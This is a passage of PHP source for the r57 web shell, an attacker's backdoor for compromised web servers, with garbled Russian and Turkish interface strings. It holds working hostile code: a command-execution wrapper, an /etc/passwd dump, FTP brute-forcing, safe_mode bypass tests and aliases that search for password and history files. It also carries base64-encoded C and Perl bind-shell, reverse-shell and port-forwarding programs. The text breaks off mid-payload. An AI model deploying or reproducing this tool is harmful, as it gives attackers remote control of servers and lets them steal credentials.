Ãèå åà éëîâ ñ óäà ëåÃÃîãî ftp-ñåðà ¢Ã¥Ã°Ã ', 'ru_text88'=>'FTP-ñåðâåð:ïîðò', 'ru_text89'=>'Ôà éë Ãà ftp ñåðâåðå', 'ru_text90'=>'Ðåæèì ïåðåäà ÷è', 'ru_text91'=>'Àðõèâèðîâà òü â', 'ru_text92'=>'áåç à ðõèâà öèè', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-áðóòåîðñ', 'ru_text95'=>'Ñïèñîê ïîëüçîâà òåëåé', 'ru_text96'=>'Íå óäà ëîñü ïîëó÷èòü ñïèñîê ïîëüçîà ¢Ã òåëåé', 'ru_text97'=>'ÏðîâåðåÃî êîìáèÃà öèé: ', 'ru_text98'=>'Óäà ÷Ãûõ ïîäêëþ÷åÃèé: ',
'ru_text99'=>'* â êà ÷åñòâå ëîãèÃà è ïà ðîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâà òåëÿ èç /etc/passwd', 'ru_text100'=>'Îòïðà âêà åà éëîâ Ãà óäà ëåÃÃûé åòï ñåðà ¢Ã¥Ã°', 'ru_text101'=>'Èñïîëüçîâà òü òà êæå ïåðåâåðÃóòîå (user -> resu) èìÿ ïîëüçîâà òåëÿ â êà ÷åñòâå ïà ðîëÿ', 'ru_text102'=>'Ïî÷òà ', 'ru_text103'=>'Îòïðà âêà ïèñüìà ', 'ru_text104'=>'Îòïðà âêà åà éëà Ãà ïî÷òîâûé ÿùèê', 'ru_text105'=>'Êîìó', 'ru_text106'=>'Îò', 'ru_text107'=>'Òåìà ', 'ru_butt15'=>'Îòïðà âèòü', 'ru_text108'=>'Òåêñò ïèñüìà ', 'ru_text109'=>'ÑâåðÃóòü', 'ru_text110'=>'Ðà çâåðÃóòü', 'ru_text111'=>'SQL-Ñåðâåð : ïîðò', 'ru_text112'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode ÷åðåç èñïîëüçîâà Ãèå åóÃêöèè mb_send_mail', 'ru_text113'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode, ïðîñìîòð ëèñòèÃãà äèðåêòîðèé ñ èñïîëüçîâà Ãèåì imap_list', 'ru_text114'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode, ïðîñìîòð ñîäåðæèìîãî åà éëà ñ èñïîëüçîâà Ãèåì imap_body', /* --------------------------------------------------------------- */ 'eng_text1' =>'Komut uygula', 'eng_text2' =>'Server uzerinde komut uygula', 'eng_text3' =>'Komut calistir', 'eng_text4' =>'Bulunan dizin', 'eng_text5' =>'Servera dosya yukle', 'eng_text6' =>'Yerel dosya', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_butt1' =>'Uygula', 'eng_butt2' =>'Yukle', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_butt3' =>'Bind', 'eng_text12'=>'Arka kapi', 'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_butt4' =>'Baglanti', 'eng_text15'=>'Uzak serverdan dosya yukle', 'eng_text16'=>'Ile', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Kullan', 'eng_text21'=>'&nbsp;New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Kullan', 'eng_butt5' =>'Calistir', 'eng_text28'=>'Su anki durum safe_mode',
'eng_text29'=>'ACCESS DENIED', 'eng_butt6' =>'Degistir', 'eng_text30'=>'Cat file', 'eng_butt7' =>'Goster', 'eng_text31'=>'Dosya bulunamadi', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions', 'eng_butt8' =>'Test', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database . Tablo', 'eng_text37'=>'Giris', 'eng_text38'=>'Sifre', 'eng_text39'=>'Database', 'eng_text40'=>'Bosaltilacak database tablosu', 'eng_butt9' =>'Bosalt', 'eng_text41'=>'Bosaltilan dosyayi kaydet', 'eng_text42'=>'Dosyalari duzenle', 'eng_text43'=>'Dosya duzenle', 'eng_butt10'=>'Kaydet', 'eng_text44'=>'Duzenlenemiyor! Sadece okunuyor!', 'eng_text45'=>'Dosya kaydedildi', 'eng_text46'=>'Goster phpinfo()', 'eng_text47'=>'Degiskenleri goster php.ini', 'eng_text48'=>'Temp doslarini sil', 'eng_butt11'=>'Duzenle', 'eng_text49'=>'Serverdan script sil', 'eng_text50'=>'Islemci bilgisine bak', 'eng_text51'=>'Hafýza bilgisine bak', 'eng_text52'=>'Metin ara', 'eng_text53'=>'In dirs', 'eng_text54'=>'Dosyalarin icinde metin ara', 'eng_butt12'=>'Ara', 'eng_text55'=>'Dosyalarda', 'eng_text56'=>'Hicbirsey :(', 'eng_text57'=>'Yarat/Dosya sil/Dir', 'eng_text58'=>'isim', 'eng_text59'=>'dosya', 'eng_text60'=>'dir', 'eng_butt13'=>'Yarat/Sil', 'eng_text61'=>'Dosya yaratildi', 'eng_text62'=>'Dir created', 'eng_text63'=>'Dosya silindi', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Yarat', 'eng_text66'=>'Sil', 'eng_text67'=>'Chown/Chgrp/Chmod', 'eng_text68'=>'Komut', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UID rn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", 'eng_text72'=>'Metin icin ara', 'eng_text73'=>'Klasor icin ara', 'eng_text74'=>'Dosyalarin icinde ara', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text80'=>'Type', 'eng_text81'=>'Net',
'eng_text82'=>'Databases', 'eng_text83'=>'SQL da sorgula', 'eng_text84'=>'SQL sor', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Serverdan dosya indir', 'eng_butt14'=>'Indir', 'eng_text87'=>'Uzak ftp sunucusundan doysa indir', 'eng_text88'=>'FTP-server:port', 'eng_text89'=>'Ftp de dosya', 'eng_text90'=>'Transfer modu', 'eng_text91'=>'Arsivleme', 'eng_text92'=>'without archivation', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Kullanici listesi', 'eng_text96'=>'Can't get users list', 'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'* kullanici isimlerinde /etc/passwd for ftp Giris ve sifre', 'eng_text100'=>'Uzak ftp sunucusuna dosya yolla', 'eng_text101'=>'Use reverse (user -> resu) login for password', 'eng_text102'=>'Mail', 'eng_text103'=>'Mail yolla', 'eng_text104'=>'Dosyayi maile yolla', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_butt15'=>'Yolla', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Goster', 'eng_text111'=>'SQL-Server : Port', 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', ); /* Àëèà ñû êîìà Ãä Ïîçâîëÿþò èçáåæà òü ìÃîãîêðà òÃîãî Ãà áîðà îäÃèõ è òåõ-æå êîìà Ãä. ( Ñäåëà Ãî áëà ãîäà ðÿ ìîåé ïðèà °Ã®Ã¤Ãîé ëåÃè ) èû ìîæåòå ñà ìè äîáà âëÿòü èëè èçìåÃÿòü êîìà Ãäû. */ $aliases=array( 'find suid files'=>'find / -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', 'find config* files'=>'find / -type f -name "config*"', 'find config* files in current dir'=>'find . -type f -name "config*"', 'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find all .bash_history files'=>'find / -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find all .mysql_history files'=>'find / -type f -name .mysql_history', 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', 'list file attributes on a Linux second extended file system'=>'lsattr -va', 'show opened ports'=>'netstat -an | grep -i listen', '---------------------------------------------------------------------------------- ------------------'=>'ls -la' ); $table_up1 = "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Wingdings color=gray>è</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET['users'])) { if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=orange>". $lang[$language.'_text96']."</font></center>"; } else { echo '<center>'; foreach($users as $user) { echo $user."<br>"; } echo '</center>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } $dir = @getcwd(); $windows = 0; $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $windows = 1; } else { $unix = 1; } } }
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= ($windows)? str_replace("/","",$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></ TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>". $lang[$language.'_text56']."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat("&nbsp;",$i); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res);
} elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file('/etc/passwd'); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(":",$string); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function we($i) { if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà ! Íå ìîãó çà ïèñà òü â åà éë '; } else { $text = "[-] ERROR! Can't write in file "; } echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$text. $i."</b></div></font></td></tr></table>"; return null; } function re($i) { if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà ! Íå ìîãó ïà °Ã®Ã·Ã¨Ã²Ã òü åà éë '; } else { $text = "[-] ERROR! Can't read file "; } echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text.$i."</b></div></font></td></tr></table>"; return null;
} function ce($i) { if($GLOBALS['language']=="ru"){ $text = "Íå óäà ëîñü ñîçäà òü "; } else { $text = "Can't create "; } echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text.$i."</b></div></font></td></tr></table>"; return null; } function fe($l,$n) { $text['ru'] = array('Íå óäà ëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðà ¢Ã¥Ã°Ã³','Îøèáêà à âòîðèçà öèè Ãà ftp ñåðâåðå','Íå óäà ëîñü ïîìåÃÿòü äèðåêòîðèþ Ãà ftp ñåðâåðå'); $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can't change dir on ftp server'); echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text[$l][$n]."</b></div></font></td></tr></table>"; return null; } function mr($l,$n) { $text['ru'] = array('Íå óäà ëîñü îòïðà âèòü ïèñüìî','Ïèñüìî îòïðà âëåÃî'); $text['eng'] = array('Can't send mail','Mail sent'); echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text[$l][$n]."</b></div></font></td></tr></table>"; return null; } function perms($mode) { if ($GLOBALS['windows']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s); } function in($type,$name,$size,$value) { $ret = "<input type=".$type." name=".$name." "; if($size != 0) { $ret .= "size=".$size." "; } $ret .= "value="".$value."">"; return $ret; } function which($pr) { $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } } function cf($fname,$text) { $w_file=@fopen($fname,"w") or we($fname); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; }
else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this- >FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = 'b'.$v.'b'; $words = '('.@implode($delim,$qq).')'; $pattern = "/".$words."/"; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a];
$CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>1</b></SPAN>",$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZS A8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0Ka W50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsN CiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1 vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIH NvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb 2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdm ZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml 0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zi kpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyc iwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50 IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQp pZihlbnRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn 0="; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR 1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3Rj cCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2N rb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaW UgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT 05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05O IjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCB leGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3Rl bT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVls xXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZH IpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX 1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7 DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3R lbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pb iBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9w b3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndls xXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1 ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgc GVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1 cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk 7IA0KfQ=="; $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbm NsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI 2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQoj aWZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGV maW5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm 4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KI CBjaGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAg c3RydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHN yLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQ ogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9yd CByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQog IGlmICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQo gICAgcGVycm9yKGFyZ3ZbM10pOw0KICA 